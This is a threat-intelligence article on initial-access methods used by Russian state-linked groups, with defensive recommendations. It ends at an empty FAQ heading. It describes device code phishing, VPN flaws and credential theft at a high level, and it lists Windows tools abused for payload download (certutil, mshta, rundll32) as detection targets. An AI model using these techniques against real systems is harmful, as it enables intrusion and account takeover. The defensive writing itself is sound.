Russian threat groups are using RDP, VPNs, supply chains, and social engineering for initial access

Russian state-linked threat groups are relying on a wider set of initial access methods, including exposed RDP services, VPN appliances, stolen credentials, supply chain weaknesses, and social engineering across email and messaging platforms.

The trend matters because attackers are no longer depending on one entry point. They are combining low-cost techniques with targeted espionage tradecraft to reach government, defense, energy, transport, telecommunications, media, and civil society targets.

Ukraine’s State Service of Special Communications and Information Protection said CERT-UA handled 5,927 cyber incidents in 2025, a 37.4% increase from 4,315 incidents in 2024. That figure shows how sustained the pressure remained across Ukrainian networks and organizations connected to the war.

Initial access now comes from several directions

Russian-linked groups such as Sandworm, APT28, Gamaredon, Star Blizzard, and Void Blizzard have all been tied to campaigns that focus on access first, then espionage, disruption, or credential theft after compromise.

Attackers often choose the fastest route into a target. In one case, that may involve stolen credentials. In another, it may involve a phishing message, an unpatched VPN appliance, an exposed RDP server, or a trusted software channel that helps the attacker avoid suspicion.

Microsoft said Void Blizzard uses stolen credentials likely obtained from commodity infostealer ecosystems and targets sectors of interest to Russia, including government, defense, transportation, media, NGOs, healthcare, and organizations in NATO member states and Ukraine.

Initial access method	How attackers use it	Main defensive priority
RDP exposure	Attackers abuse weak or exposed remote access to enter networks.	Restrict RDP, require VPN access, and monitor unusual login patterns.
VPN vulnerabilities	Attackers target edge devices that provide direct access to internal systems.	Patch quickly and reduce internet exposure on management interfaces.
Stolen credentials	Attackers buy or reuse passwords, cookies, and session tokens.	Enforce MFA, conditional access, and session revocation.
Phishing	Attackers impersonate trusted organizations, meetings, or secure apps.	Train users and block risky authentication flows.
Supply chain access	Attackers compromise trusted software, vendors, or service paths.	Monitor third-party access and validate update channels.

RDP and VPN access remain high-value targets

Remote access systems remain attractive because they sit close to sensitive internal networks. A single exposed RDP service or vulnerable VPN appliance can give attackers a direct path into an organization without needing to trick many users.

Security teams should treat VPN appliances as critical infrastructure, not routine network devices. Cisco’s ASA and FTD advisory for CVE-2025-20333 describes a VPN web server flaw that could allow an authenticated remote attacker to execute arbitrary code on affected devices.

A second Cisco issue, CVE-2025-20362, involves improper validation in HTTP requests and can allow access to restricted URLs without authentication. The risk is clear: unpatched edge devices can weaken the boundary between the internet and internal systems.

Cloud and identity attacks are becoming more important

Russian-linked actors are also targeting identity systems because cloud accounts often contain email, files, chats, shared folders, and administrative clues. Once attackers control an account, they can search for sensitive data without deploying noisy malware.

In its Void Blizzard analysis, Microsoft said the actor used password spraying, stolen credentials, and targeted spear phishing to access Exchange Online, SharePoint Online, and in some cases Microsoft Teams messages.

This explains why defenders need to treat identity logs as a core security source. Failed logins, impossible travel, new device sessions, suspicious OAuth grants, and unusual mailbox access can reveal activity that endpoint tools may miss.

Device code phishing gives attackers a stealthy path into Microsoft 365

Device code phishing abuses a legitimate Microsoft authentication flow. Attackers persuade a victim to enter a short code on a real Microsoft login page, which can authorize the attacker’s session without stealing the password directly.

Volexity reported that multiple Russian threat actors used social engineering and spear phishing to target Microsoft 365 accounts through Device Code Authentication attacks in early 2025.

The technique works because the login page can look legitimate. Users may believe they are joining a Teams meeting, gaining access to shared material, or accepting an invitation from a trusted organization.

• Disable device code flow where users do not need it.
• Use conditional access rules to block risky authentication attempts.
• Review OAuth app consents and suspicious sign-ins.
• Monitor new sessions from VPS, Tor, or unusual geographies.
• Train staff to reject unsolicited code-entry requests.

Messaging apps are also part of the phishing surface

Russian threat actors have also moved beyond email. Messaging apps give attackers a more personal channel, especially when they impersonate diplomats, defense contacts, researchers, journalists, charities, or support groups.

Microsoft said Star Blizzard targeted WhatsApp accounts by sending spear-phishing messages that led victims toward a malicious QR-code flow. The goal was to link the victim’s WhatsApp account to an attacker-controlled device.

That shift shows how attackers adapt when older phishing infrastructure gets disrupted. If defenders improve email filtering, threat actors can move to Signal, WhatsApp, Telegram, or other trusted communication channels where users may lower their guard.

Supply chain attacks create quieter access

Supply chain access can give attackers a trusted route into targets because software updates, third-party tools, contractors, and managed service relationships already have permission inside many environments.

Russian-linked groups have repeatedly shown interest in trusted access paths, especially where vendors support government, energy, defense, and communications organizations. These paths can reduce the need for obvious phishing and help attackers reach multiple victims through one upstream compromise.

Organizations should review vendor access, software update trust, remote management tools, service accounts, and third-party identity permissions. A trusted tool can still become an attack path if the account, update channel, or vendor workstation is compromised.

Living-off-the-land tools help attackers blend in

Once inside, attackers often use tools already present on Windows systems. PowerShell, certutil, mshta.exe, rundll32, scheduled tasks, and WMI can all support payload download, execution, persistence, and data collection.

This approach makes detection harder because the tools are legitimate. Security teams need to focus on context, not only file names. A normal binary becomes suspicious when it runs from an unusual parent process, downloads a payload, executes encoded commands, or reaches attacker infrastructure.

• Alert on encoded PowerShell commands and suspicious script execution.
• Monitor mshta.exe, rundll32.exe, and certutil.exe usage outside normal patterns.
• Restrict script execution where business workflows allow it.
• Collect command-line telemetry from endpoints and servers.
• Investigate unusual archive creation before outbound transfers.

Legacy vulnerabilities still matter

Older vulnerabilities remain useful for attackers because many organizations keep outdated systems, Office components, archiving tools, and internet-facing appliances in production longer than security teams expect.

Patch management should cover both new edge-device vulnerabilities and older document-handling flaws. Attackers often choose whatever still works, even if defenders consider the bug old.

The same logic applies to VPN security. Cisco’s CVE-2025-20333 advisory shows why organizations must patch internet-facing security devices quickly and not rely only on perimeter reputation or vendor trust.

Defenders need identity, endpoint, and network controls together

No single control can stop this mix of access methods. Strong MFA helps, but it will not fix an unpatched VPN device. Patching helps, but it will not stop device code phishing. Endpoint detection helps, but it may miss cloud-only data theft.

Security teams should combine patching, identity monitoring, phishing-resistant MFA, network segmentation, endpoint telemetry, and protective DNS. They should also restrict RDP access and remove unnecessary internet exposure from administrative systems.

Ukraine’s CERT-UA incident figures show how continuous the pressure has become. Organizations connected to Ukraine, NATO, defense, energy, diplomacy, media, or civil society should assume they may face repeated probing rather than one isolated campaign.

What organizations should do now

Organizations should start by reducing the easiest entry points. That means closing exposed RDP, patching VPN appliances, reviewing cloud identity controls, and checking whether device code authentication is actually needed.

They should also train staff on social engineering that begins outside email. A message on Signal, WhatsApp, Telegram, or Teams can carry the same risk as a phishing email, especially when it asks the user to scan a QR code, enter a login code, install an APK, or open an archive.

• Restrict RDP to approved VPN or zero-trust access paths.
• Patch VPN, firewall, webmail, archive, and Office vulnerabilities.
• Disable unnecessary device code authentication flows.
• Use phishing-resistant MFA for privileged and high-risk users.
• Review OAuth grants, mailbox access, and cloud file downloads.
• Monitor messaging-app phishing attempts and QR-code account linking.
• Audit vendor access and remote management tools.
• Hunt for living-off-the-land execution patterns.

The broader lesson

Russian threat activity in 2025 shows that initial access has become a flexible discipline. Attackers are mixing old techniques with cloud abuse, messaging-app phishing, stolen credentials, and edge-device exploitation.

The strongest defense starts before the first alert. Organizations should know which remote access paths exist, which identity flows they allow, which vendors can reach internal systems, and which users face the highest targeting risk.

The Volexity findings and Microsoft’s Star Blizzard research both point to the same conclusion: attackers will keep abusing trusted workflows if users and security teams do not recognize them as attack paths.

Defenders should move beyond narrow malware blocking and focus on access control, identity behavior, remote access hardening, and fast response to unusual authentication activity.

FAQ